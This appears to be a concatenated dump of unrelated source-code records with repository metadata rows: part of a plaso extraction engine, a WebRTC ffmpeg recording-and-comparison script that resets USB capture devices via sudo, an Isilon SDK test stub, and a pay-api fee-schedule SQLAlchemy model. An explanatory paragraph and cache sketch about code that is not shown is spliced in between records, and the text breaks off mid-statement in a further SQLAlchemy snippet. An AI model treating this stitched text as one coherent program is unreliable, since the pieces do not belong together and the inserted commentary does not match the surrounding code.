path_spec (dfvfs.PathSpec): path specification.
"""
self._current_display_name = parser_mediator.GetDisplayNameForPathSpec(
path_spec)
self._CacheFileSystem(path_spec)
excluded_find_specs = None
if self.collection_filters_helper:
excluded_find_specs = (
self.collection_filters_helper.excluded_file_system_find_specs)
try:
extraction_worker.ProcessPathSpec(
parser_mediator, path_spec, excluded_find_specs=excluded_find_specs)
except KeyboardInterrupt:
self._abort = True
self._processing_status.aborted = True
if self._status_update_callback:
self._status_update_callback(self._processing_status)
# We cannot recover from a CacheFullError and abort processing when
# it is raised.
except dfvfs_errors.CacheFullError:
# TODO: signal engine of failure.
self._abort = True
logger.error((
'ABORT: detected cache full error while processing '
'path spec: {0:s}').format(self._current_display_name))
# All exceptions need to be caught here to prevent the worker
# from being killed by an uncaught exception.
except Exception as exception: # pylint: disable=broad-except
parser_mediator.ProduceExtractionWarning((
'unable to process path specification with error: '
'{0!s}').format(exception), path_spec=path_spec)
if getattr(self._processing_configuration, 'debug_output', False):
self._StopStatusUpdateThread()
logger.warning(
'Unhandled exception while processing path spec: {0:s}.'.format(
self._current_display_name))
logger.exception(exception)
pdb.post_mortem()
self._StartStatusUpdateThread()
def _ProcessSources(self, source_configurations, parser_mediator):
"""Processes the sources.
Args:
source_configurations (list[SourceConfigurationArtifact]): configurations
of the sources to process.
parser_mediator (ParserMediator): parser mediator.
"""
if self._processing_profiler:
self._processing_profiler.StartTiming('process_sources')
self._status = definitions.STATUS_INDICATOR_COLLECTING
self._current_display_name = ''
self._number_of_consumed_sources = 0
find_specs = None
if self.collection_filters_helper:
find_specs = (
self.collection_filters_helper.included_file_system_find_specs)
source_path_specs = [
configuration.path_spec for configuration in source_configurations]
path_spec_generator = self._path_spec_extractor.ExtractPathSpecs(
source_path_specs, find_specs=find_specs, recurse_file_system=False,
resolver_context=self._resolver_context)
for path_spec in path_spec_generator:
if self._abort:
break
self._status = definitions.STATUS_INDICATOR_COLLECTING
self._current_display_name = parser_mediator.GetDisplayNameForPathSpec(
path_spec)
# TODO: determine if event sources should be DataStream or FileEntry
# or both.
event_source = event_sources.FileEntryEventSource(path_spec=path_spec)
parser_mediator.ProduceEventSource(event_source)
self._status = definitions.STATUS_INDICATOR_RUNNING
if self._processing_profiler:
self._processing_profiler.StartTiming('get_event_source')
event_source = self._storage_writer.GetFirstWrittenEventSource()
if self._processing_profiler:
self._processing_profiler.StopTiming('get_event_source')
while event_source:
if self._abort:
break
self._ProcessPathSpec(
self._extraction_worker, parser_mediator, event_source.path_spec)
self._number_of_consumed_sources += 1
if self._processing_profiler:
self._processing_profiler.StartTiming('get_event_source')
event_source = self._storage_writer.GetNextWrittenEventSource()
if self._processing_profiler:
self._processing_profiler.StopTiming('get_event_source')
if self._abort:
self._status = definitions.STATUS_INDICATOR_ABORTED
else:
self._status = definitions.STATUS_INDICATOR_COMPLETED
if self._processing_profiler:
self._processing_profiler.StopTiming('process_sources')
def _StartStatusUpdateThread(self):
"""Starts the status update thread."""
self._status_update_active = True
self._status_update_thread = threading.Thread(
name='Status update', target=self._StatusUpdateThreadMain)
self._status_update_thread.start()
def _StatusUpdateThreadMain(self):
"""Main function of the status update thread."""
while self._status_update_active:
self._UpdateStatus()
time.sleep(self._STATUS_UPDATE_INTERVAL)
def _StopStatusUpdateThread(self):
"""Stops the status update thread."""
if self._status_update_thread:
self._status_update_active = False
if self._status_update_thread.is_alive():
self._status_update_thread.join()
self._status_update_thread = None
def _UpdateStatus(self):
"""Updates the processing status."""
status = self._extraction_worker.processing_status
if status == definitions.STATUS_INDICATOR_IDLE:
status = self._status
if status == definitions.STATUS_INDICATOR_IDLE:
status = definitions.STATUS_INDICATOR_RUNNING
used_memory = self._process_information.GetUsedMemory() or 0
self._processing_status.UpdateForemanStatus(
self._name, status, self._pid, used_memory, self._current_display_name,
self._number_of_consumed_sources,
self._parser_mediator.number_of_produced_event_sources,
0, self._parser_mediator.number_of_produced_events,
0, 0,
0, 0)
if self._status_update_callback:
self._status_update_callback(self._processing_status)
def _CreateParserMediator(
self, knowledge_base, resolver_context, processing_configuration):
"""Creates a parser mediator.
Args:
knowledge_base (KnowledgeBase): knowledge base which contains
information from the source data needed for parsing.
resolver_context (dfvfs.Context): resolver context.
processing_configuration (ProcessingConfiguration): processing
configuration.
Returns:
ParserMediator: parser mediator.
"""
parser_mediator = parsers_mediator.ParserMediator(
knowledge_base,
collection_filters_helper=self.collection_filters_helper,
resolver_context=resolver_context)
parser_mediator.SetExtractWinEvtResources(
processing_configuration.extraction.extract_winevt_resources)
parser_mediator.SetPreferredLanguage(
processing_configuration.preferred_language)
parser_mediator.SetPreferredTimeZone(
processing_configuration.preferred_time_zone)
parser_mediator.SetPreferredYear(
processing_configuration.preferred_year)
parser_mediator.SetTemporaryDirectory(
processing_configuration.temporary_directory)
parser_mediator.SetTextPrepend(
processing_configuration.text_prepend)
return parser_mediator
def ProcessSources(
self, source_configurations, storage_writer, resolver_context,
processing_configuration, force_parser=False,
status_update_callback=None):
"""Processes the sources.
Args:
source_configurations (list[SourceConfigurationArtifact]): configurations
of the sources to process.
storage_writer (StorageWriter): storage writer for a session storage.
resolver_context (dfvfs.Context): resolver context.
processing_configuration (ProcessingConfiguration): processing
configuration.
force_parser (Optional[bool]): True if a specified parser should be forced
to be used to extract events.
status_update_callback (Optional[function]): callback function for status
updates.
Returns:
ProcessingStatus: processing status.
"""
parser_mediator = self._CreateParserMediator(
self.knowledge_base, resolver_context, processing_configuration)
parser_mediator.SetStorageWriter(storage_writer)
self._extraction_worker = worker.EventExtractionWorker(
force_parser=force_parser, parser_filter_expression=(
processing_configuration.parser_filter_expression))
self._extraction_worker.SetExtractionConfiguration(
processing_configuration.extraction)
self._parser_mediator = parser_mediator
self._processing_configuration = processing_configuration
self._resolver_context = resolver_context
self._status_update_callback = status_update_callback
self._storage_writer = storage_writer
logger.debug('Processing started.')
parser_mediator.StartProfiling(
self._processing_configuration.profiling, self._name,
self._process_information)
self._StartProfiling(self._processing_configuration.profiling)
if self._analyzers_profiler:
self._extraction_worker.SetAnalyzersProfiler(self._analyzers_profiler)
if self._processing_profiler:
self._extraction_worker.SetProcessingProfiler(self._processing_profiler)
if self._serializers_profiler:
self._storage_writer.SetSerializersProfiler(self._serializers_profiler)
if self._storage_profiler:
self._storage_writer.SetStorageProfiler(self._storage_profiler)
self._StartStatusUpdateThread()
self._parsers_counter = collections.Counter({
parser_count.name: parser_count
for parser_count in self._storage_writer.GetAttributeContainers(
'parser_count')})
try:
self._ProcessSources(source_configurations, parser_mediator)
finally:
# Stop the status update thread after close of the storage writer
# so we include the storage sync to disk in the status updates.
self._StopStatusUpdateThread()
if self._analyzers_profiler:
self._extraction_worker.SetAnalyzersProfiler(None)
if self._processing_profiler:
self._extraction_worker.SetProcessingProfiler(None)
if self._serializers_profiler:
self._storage_writer.SetSerializersProfiler(None)
if self._storage_profiler:
self._storage_writer.SetStorageProfiler(None)
self._StopProfiling()
parser_mediator.StopProfiling()
for key, value in parser_mediator.parsers_counter.items():
parser_count = self._parsers_counter.get(key, None)
if parser_count:
parser_count.number_of_events += value
self._storage_writer.UpdateAttributeContainer(parser_count)
else:
parser_count = counts.ParserCount(name=key, number_of_events=value)
self._parsers_counter[key] = parser_count
self._storage_writer.AddAttributeContainer(parser_count)
if self._abort:
logger.debug('Processing aborted.')
self._processing_status.aborted = True
else:
logger.debug('Processing completed.')
# Update the status view one last time.
self._UpdateStatus()
self._extraction_worker = None
self._file_system_cache = []
self._parser_mediator = None
self._processing_configuration = None
self._resolver_context = None
self._status_update_callback = None
self._storage_writer = None
return self._processing_status
| 35.508728
| 80
| 0.744645
|
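The _CacheFileSystem method above keeps at most _FILE_SYSTEM_CACHE_SIZE (3) objects alive, evicting the oldest entry when full and re-appending entries it sees again so the most recently used one survives. A simplified, dependency-free sketch of that policy, with generic keys instead of dfVFS path specifications:

class BoundedCache:
    """Keep at most max_size items, evicting the oldest entry when full."""

    def __init__(self, max_size=3):
        self._max_size = max_size
        self._items = []

    def touch(self, item):
        if item not in self._items:
            if len(self._items) == self._max_size:
                self._items.pop(0)          # drop the oldest entry
            self._items.append(item)
        else:
            # Re-append so the most recently used entry is evicted last.
            self._items.remove(item)
            self._items.append(item)

cache = BoundedCache(max_size=3)
for key in ["a", "b", "c", "a", "d"]:
    cache.touch(key)
print(cache._items)   # ['c', 'a', 'd']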
1a7bb48a47086915542c0dbce264404071b339b5
| 19,539
|
py
|
Python
|
rtc_tools/video_analysis.py
|
bebo/webrtc
|
61ab9c5200ffb1281d038978465543cc52598e16
|
[
"DOC",
"BSD-3-Clause"
] | null | null | null |
rtc_tools/video_analysis.py
|
bebo/webrtc
|
61ab9c5200ffb1281d038978465543cc52598e16
|
[
"DOC",
"BSD-3-Clause"
] | null | null | null |
rtc_tools/video_analysis.py
|
bebo/webrtc
|
61ab9c5200ffb1281d038978465543cc52598e16
|
[
"DOC",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2017 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
import glob
import optparse
import os
import shutil
import subprocess
import sys
import time
# Used to time-stamp output files and directories
CURRENT_TIME = time.strftime("%d_%m_%Y-%H:%M:%S")
class Error(Exception):
pass
class FfmpegError(Error):
pass
class MagewellError(Error):
pass
class CompareVideosError(Error):
pass
def _ParseArgs():
"""Registers the command-line options."""
usage = 'usage: %prog [options]'
parser = optparse.OptionParser(usage=usage)
parser.add_option('--frame_width', type='int', default=1280,
help='Width of the recording. Default: %default')
parser.add_option('--frame_height', type='int', default=720,
help='Height of the recording. Default: %default')
parser.add_option('--framerate', type='int', default=60,
help='Recording framerate. Default: %default')
parser.add_option('--ref_duration', type='int', default=20,
help='Reference recording duration. Default: %default')
parser.add_option('--test_duration', type='int', default=10,
help='Test recording duration. Default: %default')
parser.add_option('--time_between_recordings', type='int', default=5,
help='Time between starting test recording after ref.'
'Default: %default')
parser.add_option('--ref_video_device', type='string', default='/dev/video0',
help='Reference recording device. Default: %default')
parser.add_option('--test_video_device', type='string', default='/dev/video1',
help='Test recording device. Default: %default')
parser.add_option('--app_name', type='string',
help='Name of the app under test.')
parser.add_option('--recording_api', type='string', default='Video4Linux2',
help='Recording API to use. Default: %default')
parser.add_option('--pixel_format', type='string', default='yuv420p',
help='Recording pixel format Default: %default')
parser.add_option('--ffmpeg', type='string',
help='Path to the ffmpeg executable for the reference '
'device.')
parser.add_option('--video_container', type='string', default='yuv',
help='Video container for the recordings.'
'Default: %default')
parser.add_option('--compare_videos_script', type='string',
default='compare_videos.py',
help='Path to script used to compare and generate metrics.'
'Default: %default')
parser.add_option('--frame_analyzer', type='string',
default='../../out/Default/frame_analyzer',
help='Path to the frame analyzer executable.'
'Default: %default')
parser.add_option('--zxing_path', type='string',
help='Path to the zebra xing barcode analyzer.')
parser.add_option('--ref_rec_dir', type='string', default='ref',
help='Path to where reference recordings will be created.'
'Ideally keep the ref and test directories on separate'
'drives. Default: %default')
parser.add_option('--test_rec_dir', type='string', default='test',
help='Path to where test recordings will be created.'
'Ideally keep the ref and test directories on separate '
'drives. Default: %default')
parser.add_option('--test_crop_parameters', type='string',
help='ffmpeg processing parameters for the test video.')
parser.add_option('--ref_crop_parameters', type='string',
help='ffmpeg processing parameters for the ref video.')
options, _ = parser.parse_args()
if not options.app_name:
parser.error('You must provide an application name!')
if not options.test_crop_parameters or not options.ref_crop_parameters:
parser.error('You must provide ref and test crop parameters!')
# Ensure the crop filter is included in the crop parameters used for ffmpeg.
if 'crop' not in options.ref_crop_parameters:
parser.error('You must provide a reference crop filter for ffmpeg.')
if 'crop' not in options.test_crop_parameters:
parser.error('You must provide a test crop filter for ffmpeg.')
if not options.ffmpeg:
    parser.error('You must provide the location of the ffmpeg executable.')
if not os.path.isfile(options.ffmpeg):
parser.error('Cannot find the ffmpeg executable.')
# compare_videos.py dependencies.
  # optparse has no warning() helper, so print a notice and continue; without
  # these files no metrics will be generated.
  if not os.path.isfile(options.compare_videos_script):
    print ('Warning: Cannot find compare_videos.py script, no metrics will be '
           'generated!')
  if not os.path.isfile(options.frame_analyzer):
    print 'Warning: Cannot find frame_analyzer, no metrics will be generated!'
  if not os.path.isfile(options.zxing_path):
    print 'Warning: Cannot find Zebra Xing, no metrics will be generated!'
return options
def CreateRecordingDirs(options):
"""Create root + sub directories for reference and test recordings.
Args:
options(object): Contains all the provided command line options.
Returns:
record_paths(dict): key: value pair with reference and test file
absolute paths.
"""
# Create root directories for the video recordings.
if not os.path.isdir(options.ref_rec_dir):
os.makedirs(options.ref_rec_dir)
if not os.path.isdir(options.test_rec_dir):
os.makedirs(options.test_rec_dir)
# Create and time-stamp directories for all the output files.
ref_rec_dir = os.path.join(options.ref_rec_dir, options.app_name + '_' + \
CURRENT_TIME)
test_rec_dir = os.path.join(options.test_rec_dir, options.app_name + '_' + \
CURRENT_TIME)
os.makedirs(ref_rec_dir)
os.makedirs(test_rec_dir)
record_paths = {
'ref_rec_location' : os.path.abspath(ref_rec_dir),
'test_rec_location' : os.path.abspath(test_rec_dir)
}
return record_paths
def FindUsbPortForV4lDevices(ref_video_device, test_video_device):
"""Tries to find the usb port for ref_video_device and test_video_device.
Tries to find the provided ref_video_device and test_video_device devices
which use video4linux and then do a soft reset by using USB unbind and bind.
Args:
    ref_video_device(string): reference recording device path.
    test_video_device(string): test recording device path.
Returns:
usb_ports(list): USB ports(string) for the devices found.
"""
# Find the device location including USB and USB Bus ID's. Use the usb1
# in the path since the driver folder is a symlink which contains all the
# usb device port mappings and it's the same in all usbN folders. Tested
# on Ubuntu 14.04.
v4l_device_path = '/sys/bus/usb/devices/usb1/1-1/driver/**/**/video4linux/'
v4l_ref_device = glob.glob('%s%s' % (v4l_device_path, ref_video_device))
v4l_test_device = glob.glob('%s%s' % (v4l_device_path, test_video_device))
usb_ports = []
paths = []
# Split on the driver folder first since we are only interested in the
# folders thereafter.
try:
ref_path = str(v4l_ref_device).split('driver')[1].split('/')
test_path = str(v4l_test_device).split('driver')[1].split('/')
except IndexError:
print 'Could not find one or both of the specified recording devices.'
else:
paths.append(ref_path)
paths.append(test_path)
for path in paths:
for usb_id in path:
# Look for : separator and then use the first element in the list.
# E.g 3-3.1:1.0 split on : and [0] becomes 3-3.1 which can be used
# for bind/unbind.
if ':' in usb_id:
usb_ports.append(usb_id.split(':')[0])
return usb_ports
def RestartMagewellDevices(ref_video_device_path, test_video_device_path):
"""Reset the USB ports where Magewell capture devices are connected to.
Performs a soft reset by using USB unbind and bind.
This is due to Magewell capture devices have proven to be unstable after the
first recording attempt.
Args:
ref_video_device_path(string): reference recording device path.
test_video_device_path(string): test recording device path
Raises:
MagewellError: If no magewell devices are found.
"""
# Get the dev/videoN device name from the command line arguments.
ref_magewell_path = ref_video_device_path.split('/')[2]
test_magewell_path = test_video_device_path.split('/')[2]
magewell_usb_ports = FindUsbPortForV4lDevices(ref_magewell_path,
test_magewell_path)
# Abort early if no devices are found.
if len(magewell_usb_ports) == 0:
raise MagewellError('No magewell devices found.')
else:
print '\nResetting USB ports where magewell devices are connected...'
# Use the USB bus and port ID (e.g. 4-3) to unbind and bind the USB devices
# (i.e. soft eject and insert).
for usb_port in magewell_usb_ports:
echo_cmd = ['echo', usb_port]
unbind_cmd = ['sudo', 'tee', '/sys/bus/usb/drivers/usb/unbind']
bind_cmd = ['sudo', 'tee', '/sys/bus/usb/drivers/usb/bind']
# TODO(jansson) Figure out a way to call on echo once for bind & unbind
# if possible.
echo_unbind = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
unbind = subprocess.Popen(unbind_cmd, stdin=echo_unbind.stdout)
echo_unbind.stdout.close()
unbind.wait()
echo_bind = subprocess.Popen(echo_cmd, stdout=subprocess.PIPE)
bind = subprocess.Popen(bind_cmd, stdin=echo_bind.stdout)
echo_bind.stdout.close()
bind.wait()
if bind.returncode == 0:
print 'Reset done!\n'
def StartRecording(options, ref_file_location, test_file_location):
"""Starts recording from the two specified video devices.
Args:
options(object): Contains all the provided command line options.
    ref_file_location(string): Path to the directory for the reference recording.
    test_file_location(string): Path to the directory for the test recording.
Returns:
recording_files_and_time(dict): key: value pair with the path to cropped
test and reference video files.
Raises:
FfmpegError: If the ffmpeg command fails.
"""
ref_file_name = '%s_%s_ref.%s' % (options.app_name, CURRENT_TIME,
options.video_container)
ref_file = os.path.join(ref_file_location, ref_file_name)
test_file_name = '%s_%s_test.%s' % (options.app_name, CURRENT_TIME,
options.video_container)
test_file = os.path.join(test_file_location, test_file_name)
# Reference video recorder command line.
ref_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-r', '%d' % options.framerate,
'-f', '%s' % options.recording_api,
'-i', '%s' % options.ref_video_device,
'-pix_fmt', '%s' % options.pixel_format,
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-t', '%d' % options.ref_duration,
'-r', '%d' % options.framerate,
ref_file
]
# Test video recorder command line.
test_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-r', '%d' % options.framerate,
'-f', '%s' % options.recording_api,
'-i', '%s' % options.test_video_device,
'-pix_fmt', '%s' % options.pixel_format,
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-t', '%d' % options.test_duration,
'-r', '%d' % options.framerate,
test_file
]
print 'Trying to record from reference recorder...'
ref_recorder = subprocess.Popen(ref_cmd)
# Start the 2nd recording a little later to ensure the 1st one has started.
# TODO(jansson) Check that the ref_recorder output file exists rather than
# using sleep.
time.sleep(options.time_between_recordings)
print 'Trying to record from test recorder...'
test_recorder = subprocess.Popen(test_cmd)
test_recorder.wait()
ref_recorder.wait()
# ffmpeg does not abort when it fails, need to check return code.
if ref_recorder.returncode != 0 or test_recorder.returncode != 0:
# Cleanup recording directories.
shutil.rmtree(ref_file_location)
shutil.rmtree(test_file_location)
raise FfmpegError('Recording failed, check ffmpeg output.')
else:
print 'Ref file recorded to: ' + os.path.abspath(ref_file)
print 'Test file recorded to: ' + os.path.abspath(test_file)
print 'Recording done!\n'
return FlipAndCropRecordings(options, test_file_name, test_file_location,
ref_file_name, ref_file_location)
def FlipAndCropRecordings(options, test_file_name, test_file_location,
ref_file_name, ref_file_location):
"""Performs a horizontal flip of the reference video to match the test video.
This is done to the match orientation and then crops the ref and test videos
using the options.test_crop_parameters and options.ref_crop_parameters.
Args:
options(object): Contains all the provided command line options.
test_file_name(string): Name of the test video file recording.
test_file_location(string): Path to the test video file recording.
ref_file_name(string): Name of the reference video file recording.
ref_file_location(string): Path to the reference video file recording.
Returns:
recording_files_and_time(dict): key: value pair with the path to cropped
test and reference video files.
Raises:
FfmpegError: If the ffmpeg command fails.
"""
print 'Trying to crop videos...'
# Ref file cropping.
cropped_ref_file_name = 'cropped_' + ref_file_name
cropped_ref_file = os.path.abspath(
os.path.join(ref_file_location, cropped_ref_file_name))
ref_video_crop_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-i', '%s' % os.path.join(ref_file_location, ref_file_name),
'-vf', '%s' % options.ref_crop_parameters,
'-c:a', 'copy',
cropped_ref_file
]
# Test file cropping.
cropped_test_file_name = 'cropped_' + test_file_name
cropped_test_file = os.path.abspath(
os.path.join(test_file_location, cropped_test_file_name))
test_video_crop_cmd = [
options.ffmpeg,
'-v', 'error',
'-s', '%dx%d' % (options.frame_width, options.frame_height),
'-i', '%s' % os.path.join(test_file_location, test_file_name),
'-vf', '%s' % options.test_crop_parameters,
'-c:a', 'copy',
cropped_test_file
]
ref_crop = subprocess.Popen(ref_video_crop_cmd)
ref_crop.wait()
test_crop = subprocess.Popen(test_video_crop_cmd)
test_crop.wait()
# ffmpeg does not abort when it fails, need to check return code.
if ref_crop.returncode != 0 or test_crop.returncode != 0:
# Cleanup recording directories.
shutil.rmtree(ref_file_location)
shutil.rmtree(test_file_location)
raise FfmpegError('Cropping failed, check ffmpeg output.')
else:
print 'Ref file cropped to: ' + cropped_ref_file
print 'Test file cropped to: ' + cropped_test_file
print 'Cropping done!\n'
# Need to return these so they can be used by other parts.
cropped_recordings = {
'cropped_test_file' : cropped_test_file,
'cropped_ref_file' : cropped_ref_file
}
return cropped_recordings
def CompareVideos(options, cropped_ref_file, cropped_test_file):
"""Runs the compare_video.py script from src/webrtc/rtc_tools using path.
Uses the path from recording_result and writes the output to a file named
<options.app_name + '_' + CURRENT_TIME + '_result.txt> in the reference video
recording folder taken from recording_result.
Args:
options(object): Contains all the provided command line options.
cropped_ref_file(string): Path to cropped reference video file.
cropped_test_file(string): Path to cropped test video file.
Raises:
CompareVideosError: If compare_videos.py fails.
"""
print 'Starting comparison...'
print 'Grab a coffee, this might take a few minutes...'
compare_videos_script = os.path.abspath(options.compare_videos_script)
rec_path = os.path.abspath(os.path.join(
os.path.dirname(cropped_test_file)))
result_file_name = os.path.join(rec_path, '%s_%s_result.txt') % (
options.app_name, CURRENT_TIME)
# Find the crop dimensions (e.g. 950 and 420) in the ref crop parameter
# string: 'hflip, crop=950:420:130:56'
for param in options.ref_crop_parameters.split('crop'):
if param[0] == '=':
crop_width = int(param.split(':')[0].split('=')[1])
crop_height = int(param.split(':')[1])
compare_cmd = [
compare_videos_script,
'--ref_video=%s' % cropped_ref_file,
'--test_video=%s' % cropped_test_file,
'--frame_analyzer=%s' % os.path.abspath(options.frame_analyzer),
'--zxing_path=%s' % options.zxing_path,
'--ffmpeg_path=%s' % options.ffmpeg,
'--stats_file_ref=%s_stats.txt' %
os.path.join(os.path.dirname(cropped_ref_file), cropped_ref_file),
'--stats_file_test=%s_stats.txt' %
os.path.join(os.path.dirname(cropped_test_file), cropped_test_file),
'--yuv_frame_height=%d' % crop_height,
'--yuv_frame_width=%d' % crop_width
]
with open(result_file_name, 'w') as f:
try:
compare_video_recordings = subprocess.check_output(compare_cmd)
f.write(compare_video_recordings)
except subprocess.CalledProcessError as error:
raise CompareVideosError('Failed to perform comparison: %s' % error)
else:
print 'Result recorded to: %s' % os.path.abspath(result_file_name)
print 'Comparison done!'
return compare_video_recordings
def main():
"""The main function.
A simple invocation is:
./run_video_analysis.py \
--app_name AppRTCMobile \
--ffmpeg ./ffmpeg --ref_video_device=/dev/video0 \
--test_video_device=/dev/video1 \
--zxing_path ./zxing \
--test_crop_parameters 'crop=950:420:130:56' \
--ref_crop_parameters 'hflip, crop=950:420:130:56' \
--ref_rec_dir /tmp/ref \
--test_rec_dir /tmp/test
This will produce the following files if successful:
# Original video recordings.
/tmp/ref/AppRTCMobile_<recording date and time>_ref.yuv
/tmp/test/AppRTCMobile_<recording date and time>_test.yuv
# Cropped video recordings according to the crop parameters.
/tmp/ref/cropped_AppRTCMobile_<recording date and time>_ref.yuv
  /tmp/test/cropped_AppRTCMobile_<recording date and time>_test.yuv
# Comparison metrics from cropped test and ref videos.
  /tmp/test/AppRTCMobile_<recording date and time>_result.txt
"""
options = _ParseArgs()
RestartMagewellDevices(options.ref_video_device, options.test_video_device)
record_paths = CreateRecordingDirs(options)
recording_result = StartRecording(options, record_paths['ref_rec_location'],
record_paths['test_rec_location'])
  # The compare_videos.py script is optional; if it is missing, no metrics are generated.
if options.compare_videos_script:
CompareVideos(options, recording_result['cropped_ref_file'],
recording_result['cropped_test_file'])
else:
    print ('Skipping video comparison because the compare_videos_script flag '
           'was not passed.')
if __name__ == '__main__':
sys.exit(main())
| 38.236791
| 80
| 0.692359
|
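The crop-dimension parsing inside CompareVideos above is easy to exercise in isolation. The standalone helper below uses the same string format ('hflip, crop=950:420:130:56') and adds a guard for empty split fragments; the function name is invented.

def parse_crop_dimensions(crop_parameters):
    """Return (width, height) from an ffmpeg crop filter string."""
    for param in crop_parameters.split('crop'):
        if param and param[0] == '=':
            width = int(param.split(':')[0].split('=')[1])
            height = int(param.split(':')[1])
            return width, height
    raise ValueError('No crop filter found in %r' % crop_parameters)

print(parse_crop_dimensions('hflip, crop=950:420:130:56'))   # (950, 420)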
9184315bf23b8723f9a64149471231551a9b503d
| 922
|
py
|
Python
|
isi_sdk_8_2_2/test/test_hdfs_fsimage_job_job.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24
|
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_2_2/test/test_hdfs_fsimage_job_job.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46
|
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_2_2/test/test_hdfs_fsimage_job_job.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29
|
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 9
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_2_2
from isi_sdk_8_2_2.models.hdfs_fsimage_job_job import HdfsFsimageJobJob # noqa: E501
from isi_sdk_8_2_2.rest import ApiException
class TestHdfsFsimageJobJob(unittest.TestCase):
"""HdfsFsimageJobJob unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testHdfsFsimageJobJob(self):
"""Test HdfsFsimageJobJob"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_2_2.models.hdfs_fsimage_job_job.HdfsFsimageJobJob() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22.487805
| 93
| 0.711497
|
a16f300ddc0c8b4b3a0cd958f036c294d5fe130e
| 3,366
|
py
|
Python
|
pay-api/src/pay_api/models/fee_schedule.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/src/pay_api/models/fee_schedule.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
pay-api/src/pay_api/models/fee_schedule.py
|
saravankumarpa/sbc-pay
|
2362549e52c575ab4ea6c19de987f0ebc9d06571
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Model to handle all operations related to fee and fee schedule."""
from datetime import date, datetime
from sqlalchemy import ForeignKey
from sqlalchemy.orm import relationship
from .corp_type import CorpType
from .db import db, ma
from .fee_code import FeeCode
from .filing_type import FilingType
class FeeSchedule(db.Model):
"""This class manages all of the base data about a fee schedule.
Fee schedule holds the data related to filing type and fee code which is used to calculate the fees for a filing
"""
__tablename__ = 'fee_schedule'
__table_args__ = (
db.UniqueConstraint('filing_type_code', 'corp_type_code', 'fee_code', name='unique_fee_sched_1'),
)
fee_schedule_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
filing_type_code = db.Column(db.String(10), ForeignKey('filing_type.code'), nullable=False)
corp_type_code = db.Column(db.String(10), ForeignKey('corp_type.code'), nullable=False)
fee_code = db.Column(db.String(10), ForeignKey('fee_code.code'), nullable=False)
fee_start_date = db.Column('fee_start_date', db.Date, default=date.today(), nullable=False)
fee_end_date = db.Column('fee_end_date', db.Date, default=None, nullable=True)
filing_type = relationship(FilingType, foreign_keys=[filing_type_code], lazy='joined', innerjoin=True)
corp_type = relationship(CorpType, foreign_keys=[corp_type_code], lazy='joined', innerjoin=True)
fee = relationship(FeeCode, foreign_keys=[fee_code], lazy='joined', innerjoin=True)
@classmethod
def find_by_filing_type_and_corp_type(cls, corp_type_code: str,
filing_type_code: str,
valid_date: datetime = None
):
"""Given a filing_type_code and corp_type, this will return fee schedule."""
if not valid_date:
valid_date = date.today()
fee_schedule = None
if filing_type_code and corp_type_code:
query = cls.query.filter_by(filing_type_code=filing_type_code). \
filter_by(corp_type_code=corp_type_code). \
filter(FeeSchedule.fee_start_date <= valid_date). \
filter((FeeSchedule.fee_end_date.is_(None)) | (FeeSchedule.fee_end_date >= valid_date))
fee_schedule = query.one_or_none()
return fee_schedule
def save(self):
"""Save fee schedule."""
db.session.add(self)
db.session.commit()
class FeeScheduleSchema(ma.ModelSchema):
"""Main schema used to serialize the Business."""
class Meta: # pylint: disable=too-few-public-methods
"""Returns all the fields from the SQLAlchemy class."""
model = FeeSchedule
| 41.555556
| 116
| 0.691919
|
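The date-window filter in find_by_filing_type_and_corp_type above (start date on or before the valid date, end date either null or on/after it) can be checked with a small standalone SQLAlchemy 1.4+ sketch against an in-memory SQLite database. The Fee model and its values below are stand-ins, not the pay-api FeeSchedule.

from datetime import date
from sqlalchemy import Column, Date, Integer, String, create_engine, or_
from sqlalchemy.orm import Session, declarative_base

Base = declarative_base()

class Fee(Base):
    __tablename__ = 'fee'
    id = Column(Integer, primary_key=True)
    filing_type = Column(String(10))
    fee_start_date = Column(Date, nullable=False)
    fee_end_date = Column(Date, nullable=True)

engine = create_engine('sqlite://')
Base.metadata.create_all(engine)

with Session(engine) as session:
    session.add_all([
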